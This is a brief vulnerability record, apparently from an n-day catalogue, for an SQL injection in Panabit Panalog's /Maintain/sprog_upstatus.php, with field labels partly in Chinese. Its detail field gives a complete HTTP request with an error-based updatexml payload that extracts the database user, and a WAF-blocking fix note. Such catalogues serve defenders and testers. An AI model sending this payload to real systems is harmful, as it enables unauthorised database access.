vendor = "Panabit"
name = "Panabit Panalog /Maintain/sprog_upstatus.phpSQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/Maintain/sprog_upstatus.php"
detail = "GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat( 0x7e,user()),0)&rdb=1 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Accept-Encoding: gzip, deflate Accept: */*"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
